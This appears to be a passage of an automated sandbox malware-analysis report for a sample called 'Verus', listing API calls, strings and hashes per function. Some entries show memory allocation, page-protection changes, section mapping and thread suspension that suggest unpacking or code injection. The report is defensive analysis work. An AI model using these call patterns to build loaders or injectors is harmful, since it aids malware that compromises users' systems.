VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?), ref: 00BA9FC8
NtMapViewOfSection.NTDLL(?,00000000), ref: 00BAA07D
VirtualProtect.KERNEL32(?,?,00000008,?), ref: 00BAA09A
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00BAA13F
VirtualProtect.KERNEL32(?,?,00000002,00000000), ref: 00BAA174

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID: Virtual$ProtectSection$View$AllocCreate
String ID:
API String ID: 2664363762-0
Opcode ID: 0b64ae62a9707750b83c9f98bbf6d7199bee7893939f3559e4f57fa99803780f
Instruction ID: b1e96e5e36ebd242889c6be3a93ec073780ea9743e33812798b970b0d127df82
Opcode Fuzzy Hash: 0b64ae62a9707750b83c9f98bbf6d7199bee7893939f3559e4f57fa99803780f
Instruction Fuzzy Hash: F4427971608301AFDB24CF24CC84B6AB7E9EF8A714F14486DF985DB291E774E944CB62

Function 00B50E03 Relevance: 6.1, APIs: 4, Instructions: 100
threadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,00B50949,?,00000001,?,81EC8B55,000000FF), ref: 00B50E41
Thread32First.KERNEL32(00000000,0000001C), ref: 00B50E6D
Wow64SuspendThread.KERNEL32(00000000), ref: 00B50EC0
CloseHandle.KERNEL32(00000000), ref: 00B50EEA

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
String ID:
API String ID: 1849706056-0
Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction ID: 9787555511a813001fa74e5cc48372313464bdf2802444caf0031e372a46e18c
Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction Fuzzy Hash: 29410F75A00108AFDB18DF58C491FADB7F6EF88300F2081A8EA159B794DB34AE45CB54

Function 00B50CB3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00B50D7F

Strings

,, xrefs: 00B50DCB

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: ,
API String ID: 2422867632-3772416878
Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction ID: 34dd6b035b05d984a20982c0d2277433309170bd29ace2037da0becd211d2b5a
Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction Fuzzy Hash: 4541C674A00209EFDB04DF98C994BAEB7B1FF48315F2081A8D9156B381C771AE85DF94

Function 00B506F3 Relevance: 1.9, APIs: 1, Instructions: 399
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 00B50996

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 37a416c80411f4bf720b30b05a34d353fd66dab89a70e68412e44836574f323a
Instruction ID: d41d6fce3c106465a2315305af19d8cdc1df60ca8d3717fd36bae58a9af66315
Opcode Fuzzy Hash: 37a416c80411f4bf720b30b05a34d353fd66dab89a70e68412e44836574f323a
Instruction Fuzzy Hash: B912E1B0E00219DFDB14DF98C990BADBBB1FF88305F2482A9D915AB385C7346A45CF54

Function 004A6509 Relevance: 1.6, APIs: 1, Instructions: 308
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(D4DFBAB2,0005AEFC,-97D92704,0049AC0D,?,004F0BB0,00000000,?,?,0049ADC3,00000000,00000000,0049AE24,004E7408,0000000C,00491BF7), ref: 004A65EC

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7d602b82bfdd9be5fc80e0387d5a96dd78204910e64865391be4889fc912166c
Instruction ID: 113d0571355df875dd1368acb10488e3ebbe67834d27aa955468cfa1c944fd8a
Opcode Fuzzy Hash: 7d602b82bfdd9be5fc80e0387d5a96dd78204910e64865391be4889fc912166c
Instruction Fuzzy Hash: F1A1F7779042208F8709EF7AEC461693B52F7E1318346D62ED942EB765CF38540EABC9

Function 00BAA795 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(00000000,?,?), ref: 00BAA827

Strings

.dll, xrefs: 00BAA7CC

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .dll
API String ID: 1029625771-2738580789
Opcode ID: 22e7a93ae9463fbf26fe8a64879a4a4537edfd71a6a3bb27af4a5e412625cd75
Instruction ID: 8335b815e311c706e1cfb116b590f02b7a2dd5845cd880c7c941379adb38c499
Opcode Fuzzy Hash: 22e7a93ae9463fbf26fe8a64879a4a4537edfd71a6a3bb27af4a5e412625cd75
Instruction Fuzzy Hash: 9821DA356082859FD721DFA9D444A7ABBF4EF06320F1841EDD81187A41E730EC45C7A1

Function 00BA93B3 Relevance: 1.6, APIs: 1, Instructions: 318
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BA942C

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 110a8e11aacf9450550942e71900ee3962611d5b415020ec746abf44dec659d6
Instruction ID: 5ef77ce5c9b92dc0f5a440f796abfe35bab4ffb0830b5beaee5afecc9a059814
Opcode Fuzzy Hash: 110a8e11aacf9450550942e71900ee3962611d5b415020ec746abf44dec659d6
Instruction Fuzzy Hash: F7B1F431508702ABDB329E68CC81BA7F7E8FF4B310F140599F55982150EB31F955EBA2

Non-executed Functions

Function 00453190 Relevance: 83.2, APIs: 42, Strings: 5, Instructions: 945
windowstringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00445CA0: GetDC.USER32(00000000), ref: 00445CAA
Part of subcall function 00445CA0: GetDeviceCaps.GDI32(00000000), ref: 00445CB1
Part of subcall function 00445CA0: LoadBitmapW.USER32(?,000000E4), ref: 00445CD6
Part of subcall function 00445CA0: ImageList_Create.COMCTL32(00000010,00000010,00000020,00000000,00000013), ref: 00445CEA
Part of subcall function 00445CA0: ImageList_Add.COMCTL32(00000000,00000000,00000000), ref: 00445CF3
Part of subcall function 00445CA0: LoadBitmapW.USER32(?,000000F9), ref: 00445D05
Part of subcall function 00445CA0: ImageList_Create.COMCTL32(00000020,00000020,00000020,00000000,00000013), ref: 00445D13
Part of subcall function 00445CA0: ImageList_Add.COMCTL32(00000000,00000000,00000000), ref: 00445D1C
Part of subcall function 00445CA0: DeleteObject.GDI32(00000000), ref: 00445D29
Part of subcall function 00445CA0: DeleteObject.GDI32(00000000), ref: 00445D2C

GetMenu.USER32(?), ref: 004531E0

Part of subcall function 00446AB0: IsMenu.USER32(?), ref: 00446AD7
Part of subcall function 00446AB0: DestroyMenu.USER32(?), ref: 00446AF3
Part of subcall function 00446AB0: SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00446B18
Part of subcall function 00446AB0: SendMessageW.USER32(?,00000418,00000000,00000000), ref: 00446B25
Part of subcall function 00446AB0: SendMessageW.USER32(?,00000416,00000000,00000000), ref: 00446B3B
Part of subcall function 00446AB0: GetMenuItemCount.USER32(?), ref: 00446B4E
Part of subcall function 00446AB0: _memset.LIBCMT ref: 00446B6A
Part of subcall function 00446AB0: GetMenuItemInfoW.USER32 ref: 00446BA5
Part of subcall function 00446AB0: lstrlenW.KERNEL32(?), ref: 00446BB0
Part of subcall function 00446AB0: SetMenuItemInfoW.USER32(?,00000000,00000001,?), ref: 00446BCF

Part of subcall function 0043FFC0: __recalloc.LIBCMT ref: 00440006

SetMenu.USER32(?,00000000), ref: 00453393

Part of subcall function 00452890: SendMessageW.USER32(?,00000454,00000000,00000001), ref: 004528F1
Part of subcall function 00452890: SendMessageW.USER32(?,00000430,00000000,?), ref: 00452913

CreateWindowExW.USER32(00000000,ReBarWindow32,00000000,56002640,00000000,00000000,00000064,00000064,?,0000E800,?,00000000), ref: 004533C7
SendMessageW.USER32 ref: 00453409
DestroyWindow.USER32(?), ref: 00453414
SendMessageW.USER32(00000000,00000418,00000000,00000000), ref: 0045343D
_memset.LIBCMT ref: 00453454
SendMessageW.USER32(00000000,0000041D,?,?), ref: 004534B0
SendMessageW.USER32(00000000,0000041D,00000000,?), ref: 004534D3
GetWindowRect.USER32(00000000,?), ref: 004534E9
SendMessageW.USER32(?,0000040A,000000FF,?), ref: 00453524
SendMessageW.USER32(00000000,00000418,00000000,00000000), ref: 00453533
_memset.LIBCMT ref: 00453548
SendMessageW.USER32(00000000,0000041D,-00000001,?), ref: 004535A8
SendMessageW.USER32(00000000,0000041D,00000000,?), ref: 004535CB
GetWindowRect.USER32(00000000,?), ref: 004535E1
SendMessageW.USER32(?,0000040A,000000FF,?), ref: 0045361E
GetCurrentThreadId.KERNEL32 ref: 00453732
EnterCriticalSection.KERNEL32(-00000010), ref: 00453746
LeaveCriticalSection.KERNEL32(-00000010), ref: 0045375F
_memset.LIBCMT ref: 00453799
SetMenuItemInfoW.USER32 ref: 004537DE
SetMenuItemInfoW.USER32(?,00008019,00000000,?), ref: 004537F6
SetMenuItemInfoW.USER32(?,0000801A,00000000,?), ref: 0045380E
SetMenuItemInfoW.USER32(?,0000801B,00000000,?), ref: 00453826
GetClientRect.USER32(?,?), ref: 0045383B
GetWindowLongW.USER32(?,000000F0), ref: 0045387D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00453898
GetWindowLongW.USER32(?,000000F0), ref: 004538A0
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004538B5
SendMessageW.USER32(?,00000410,00000002,00000000), ref: 0045390E
SendMessageW.USER32(?,00000423,00000000), ref: 0045391A
ShowWindow.USER32(?,00000000), ref: 00453944
OleInitialize.OLE32(00000000), ref: 0045394C
RegisterDragDrop.OLE32(?,?), ref: 00453966
RegisterDragDrop.OLE32(?,?), ref: 00453976
LoadStringW.USER32(?,00000080,?,00000020), ref: 004539C5
lstrlenW.KERNEL32(?), ref: 004539D9
lstrcmpW.KERNEL32(?,?), ref: 00453AB1
lstrlenW.KERNEL32(?), ref: 00454150
MessageBoxW.USER32(?,?,004C49AC,00000030), ref: 00454185
SetWindowTextW.USER32(?,FeyWriter), ref: 00454194

Strings

P, xrefs: 00453540
ReBarWindow32, xrefs: 004533C1
,, xrefs: 004537BD
@, xrefs: 0045336C
FeyWriter, xrefs: 0045418E

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Message$Send$Menu$Window$Item$Info$ImageList_Long_memset$CreateLoadRectlstrlen$BitmapCriticalDeleteDestroyDragDropObjectRegisterSection$CapsClientCountCurrentDeviceEnterInitializeLeaveShowStringTextThread__recalloclstrcmp
String ID: ,$@$FeyWriter$P$ReBarWindow32
API String ID: 293126401-319592100
Opcode ID: b9e908563ea052dcf01133d6273800cd8d618a06087f60658096ee94c4e35542
Instruction ID: a0eb8e1a8713fd159668aa09ec9f3a9be1b1bf233b7157d839c843befdeb90ef
Opcode Fuzzy Hash: b9e908563ea052dcf01133d6273800cd8d618a06087f60658096ee94c4e35542
Instruction Fuzzy Hash: 03824C702183819BE324DF65C850BABB3E5FFD8700F009D2EA589D73A1EB799905875B

Function 0042A650 Relevance: 82.9, APIs: 10, Strings: 37, Instructions: 641
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_sprintf.LIBCMT ref: 0042A884

Part of subcall function 00444320: IsWindow.USER32(?), ref: 00444336
Part of subcall function 00444320: _vswprintf_s.LIBCMT ref: 0044435A
Part of subcall function 00444320: GetWindowTextLengthW.USER32(?), ref: 0044436C
Part of subcall function 00444320: SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0044437F
Part of subcall function 00444320: SendMessageW.USER32(?,000000B7,00000000,00000000), ref: 0044438E
Part of subcall function 00444320: SendMessageW.USER32(?,000000C2,00000000,AD5E02B4), ref: 0044439C
Part of subcall function 00444320: GetWindowTextLengthW.USER32(?), ref: 004443A2
Part of subcall function 00444320: SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004443AF
Part of subcall function 00444320: SendMessageW.USER32(?,000000B7,00000000,00000000), ref: 004443BE
Part of subcall function 00444320: SendMessageW.USER32(?,000000C2,00000000,004C91E0), ref: 004443D0
Part of subcall function 00444320: lstrlenW.KERNEL32(AD5E02B4), ref: 004443E4

Part of subcall function 00435E00: _sprintf.LIBCMT ref: 00435E13

_sprintf.LIBCMT ref: 0042A938
_sprintf.LIBCMT ref: 0042A974
_sprintf.LIBCMT ref: 0042AB7A

Strings

-dummy, xrefs: 0042A9CF
SWABAUDIO, xrefs: 0042AC3B
readom.exe, xrefs: 0042A81F
burnfree,, xrefs: 0042AA69
-raw96r, xrefs: 0042AA03
-v dev=, xrefs: 0042A832, 0042A8E6
noforcespeed,, xrefs: 0042AB28
-tao pregap=0, xrefs: 0042A9FC
-tao, xrefs: 0042A9F5
CCore::CopyDisc, xrefs: 0042A6B3
gracetime=%d, xrefs: 0042A932
VARIREC, xrefs: 0042AB4F
-raw16, xrefs: 0042AA0A
-swab, xrefs: 0042AC58
Target: [%d,%d,%d] %s %s %s, xrefs: 0042A701
-nofix, xrefs: 0042AC10
-eject, xrefs: 0042A9B6
-pad, xrefs: 0042ABF7
speed=%d, xrefs: 0042A87E, 0042ACA7
varirec=%d,, xrefs: 0042AB74
noburnfree,, xrefs: 0042AA8F
-overburn, xrefs: 0042AC29
fs=%dm, xrefs: 0042A96E
-ignsize, xrefs: 0042AC71
FORCESPEED, xrefs: 0042AAFD
-immed, xrefs: 0042AC8A
AUDIOMASTER, xrefs: 0042AAAD
-sao, xrefs: 0042A9EE
-raw96p, xrefs: 0042AA11
f=- 2> NUL: | , xrefs: 0042A8C6
-noerror -nocorr, xrefs: 0042A8B6
Source: [%d,%d,%d] %s %s %s, xrefs: 0042A6DA
cd , xrefs: 0042ACFA
audiomaster,, xrefs: 0042AAD8
driveropts=, xrefs: 0042AA1F
wodim.exe, xrefs: 0042A8D6
Eject = %d, Simulate = %d, BUP = %d, Pad tracks = %d, Fixate = %d, Overburn = %d, Swab = %d, Ignore size = %d, Immed = %d, Audio, xrefs: 0042A782

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$_sprintf$Window$LengthText$_vswprintf_slstrlen
String ID: Eject = %d, Simulate = %d, BUP = %d, Pad tracks = %d, Fixate = %d, Overburn = %d, Swab = %d, Ignore size = %d, Immed = %d, Audio$ Source: [%d,%d,%d] %s %s %s$ Target: [%d,%d,%d] %s %s %s$ -dummy$ -eject$ -ignsize$ -immed$ -noerror -nocorr$ -nofix$ -overburn$ -pad$ -raw16$ -raw96p$ -raw96r$ -sao$ -swab$ -tao$ -tao pregap=0$ -v dev=$ driveropts=$ f=- 2> NUL: | $ fs=%dm$ gracetime=%d$ speed=%d$AUDIOMASTER$CCore::CopyDisc$FORCESPEED$SWABAUDIO$VARIREC$audiomaster,$burnfree,$cd $noburnfree,$noforcespeed,$readom.exe$varirec=%d,$wodim.exe
API String ID: 27504158-189632902
Opcode ID: 49714ddc54d23fd2926ba3300ef0d2b6f6c4c8cbfe8d46f49b1e6df5a1933516
Instruction ID: 12f4f294d1a7f901a90bd9a478d76589c7054e655c548a8934c5995a6f18bcfe
Opcode Fuzzy Hash: 49714ddc54d23fd2926ba3300ef0d2b6f6c4c8cbfe8d46f49b1e6df5a1933516
Instruction Fuzzy Hash: 3F323671608380AFD314DB25EC95FAB77E4AF84308F84452EF985472A2DB78A548CB5A

Function 00B72350 Relevance: 38.9, Strings: 30, Instructions: 1384COMMON

Download Yara Rule

Strings

Ga@J, xrefs: 00B72599
z, xrefs: 00B72734
%*+(, xrefs: 00B72C55
YZ[+, xrefs: 00B725D0
tuv?, xrefs: 00B72810
LMNg, xrefs: 00B727A2
mnop, xrefs: 00B72607
x, xrefs: 00B72DEC
uFuS, xrefs: 00B7261D
h, xrefs: 00B729AA
T, xrefs: 00B72675
7ABC, xrefs: 00B7314D
_=I?, xrefs: 00B73135
("C, xrefs: 00B727E4
SH'T, xrefs: 00B725BA
DsQX, xrefs: 00B725C5
IJKL, xrefs: 00B725A4
pqrs, xrefs: 00B72805
akm~, xrefs: 00B725AF
, xrefs: 00B72A64, 00B72A7A
<=>?, xrefs: 00B72776
57W3, xrefs: 00B7258E
r}, xrefs: 00B731F3
y1D3, xrefs: 00B73165
6~, xrefs: 00B732FB
h {, xrefs: 00B727EF
`abc, xrefs: 00B727D9
xr, xrefs: 00B73303
U^_`, xrefs: 00B725DB
q2), xrefs: 00B72649

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID: %*+($("C$57W3$6~$7ABC$<=>?$DsQX$Ga@J$IJKL$LMNg$SH'T$T$U^_`$YZ[+$_=I?$`abc$akm~$h$h {$mnop$pqrs$q2)$r}$tuv?$uFuS$x$xr$y1D3$z$
API String ID: 0-2038162739
Opcode ID: 62c3536aea6cbad9d1f3e34df99c784c0cd6d12dac64ede8b8c03c082178660f
Instruction ID: 6ba521d370765788bbf32a85a063ac58a67472d1751086b596f4bfe2e63842c9
Opcode Fuzzy Hash: 62c3536aea6cbad9d1f3e34df99c784c0cd6d12dac64ede8b8c03c082178660f
Instruction Fuzzy Hash: 8CA2E1706083818BD735CF24C8917ABBBE1EFD6704F1889ACE5E99B392D7748905CB52

Function 004406C0 Relevance: 37.3, APIs: 17, Strings: 4, Instructions: 506registrystringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,?,?,?,Delete,?,AD5E0258,?,?,?,?,?,004C0996,000000FF), ref: 00440769
lstrcmpiW.KERNEL32(?,ForceRemove,?,?,?,?,Delete,?,AD5E0258,?,?,?,?,?,004C0996,000000FF), ref: 00440778
CharNextW.USER32(?,?,?,?,?,?,Delete,?,AD5E0258,?,?,?,?,?,004C0996,000000FF), ref: 004407C3
lstrlenW.KERNEL32(?,?,?,?,?,?,Delete,?,AD5E0258,?,?,?,?,?,004C0996,000000FF), ref: 00440840
lstrcmpiW.KERNEL32(?,NoRemove,?,?,?,?,?,Delete,?,AD5E0258,?,?,?,?,?,004C0996), ref: 0044089B
lstrcmpiW.KERNEL32(?,Val,?,?,?,?,Delete,?,AD5E0258,?,?,?,?,?,004C0996,000000FF), ref: 004408C3
RegDeleteValueW.ADVAPI32(?,?,?,?,?,?,?,?,Delete,?,AD5E0258), ref: 0044099D
RegCloseKey.ADVAPI32(?,?,?,?,?,Delete,?,AD5E0258,?,?,?,?,?,004C0996,000000FF), ref: 004409B5
CharNextW.USER32(?,?,?,?,?,Delete,?,AD5E0258,?,?,?,?,?,004C0996,000000FF), ref: 004409E8
RegOpenKeyExW.ADVAPI32(?,?,00000000,0002001F,?,?,?,?,?,Delete,?,AD5E0258), ref: 00440A22
RegCloseKey.ADVAPI32(?,?,?,?,?,Delete,?,AD5E0258,?,?,?,?,?,004C0996,000000FF), ref: 00440A37
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,Delete,?,AD5E0258), ref: 00440A84
RegCloseKey.ADVAPI32(?,?,?,?,?,Delete,?,AD5E0258,?,?,?,?,?,004C0996,000000FF), ref: 00440A9F

Part of subcall function 0043F590: CharNextW.USER32 ref: 0043F5CD
Part of subcall function 0043F590: CharNextW.USER32(00000000), ref: 0043F5ED
Part of subcall function 0043F590: CharNextW.USER32(00000000), ref: 0043F606
Part of subcall function 0043F590: CharNextW.USER32 ref: 0043F60D
Part of subcall function 0043F590: CharNextW.USER32(00000000), ref: 0043F65B

lstrlenW.KERNEL32(?,?), ref: 00440B71
RegCloseKey.ADVAPI32(?,?), ref: 00440C5B
RegDeleteKeyW.ADVAPI32(?,?), ref: 00440C97

Part of subcall function 0043F8B0: RegCloseKey.ADVAPI32 ref: 0043F8BA

RegCloseKey.ADVAPI32(?,?,?,?,?,?,Delete,?,AD5E0258,?,?,?,?,?,004C0996,000000FF), ref: 00440D3D

Strings

ForceRemove, xrefs: 0044076F
NoRemove, xrefs: 00440895
Val, xrefs: 004408BD
Delete, xrefs: 0044075B

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: CharNext$Close$lstrcmpi$Deletelstrlen$CreateOpenValue
String ID: Delete$ForceRemove$NoRemove$Val
API String ID: 294063509-1781481701
Opcode ID: 1c1245280ed0f6f92781f3226438132087c242e83d6970696e6962a952785be6
Instruction ID: 4b98f7d54cad09cc4da8e56326b623f6ef80ffe79366811204f4bb2327b26fff
Opcode Fuzzy Hash: 1c1245280ed0f6f92781f3226438132087c242e83d6970696e6962a952785be6
Instruction Fuzzy Hash: 4802C7719083159BE724AF65C994A2FB7E4AF98704F00092FF68693351DB7CDC18C79A

Function 00420B80 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 155stringwindowfileCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000143,00000000,English (default)), ref: 00420BB0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00420BBF
GetModuleFileNameW.KERNEL32(00000000,?,00000103), ref: 00420BD0

Part of subcall function 00477110: lstrlenW.KERNEL32(?,?,?,?,0041A5D4,?), ref: 0047711E
Part of subcall function 00477110: lstrlenW.KERNEL32(?,?,?,?,0041A5D4,?), ref: 00477135
Part of subcall function 00477110: lstrlenW.KERNEL32(?,?,?,?,0041A5D4,?), ref: 00477154

lstrcatW.KERNEL32(?,Languages\), ref: 00420BF9
lstrcpyW.KERNEL32(?,?), ref: 00420C0B
lstrcatW.KERNEL32(?,*.irl), ref: 00420C1E
FindFirstFileW.KERNEL32(?,?), ref: 00420C2D
lstrcmpW.KERNEL32(?,004C4DCC,?), ref: 00420CA0
lstrcmpW.KERNEL32(?,004C4DC4), ref: 00420CB4
lstrcpyW.KERNEL32(?,?), ref: 00420CD1
lstrcpyW.KERNEL32(?,?), ref: 00420CEF
SendMessageW.USER32(?,00000143,00000000,?), ref: 00420D19
lstrcmpW.KERNEL32(?,004EE70C), ref: 00420D25
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 00420D3A
SendMessageW.USER32(?,0000014E,-00000001,00000000), ref: 00420D49
FindNextFileW.KERNEL32(000000FF,?), ref: 00420D55
FindClose.KERNEL32(000000FF), ref: 00420D68

Strings

English (default), xrefs: 00420B9E
Languages\, xrefs: 00420BEC
*.irl, xrefs: 00420C11

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
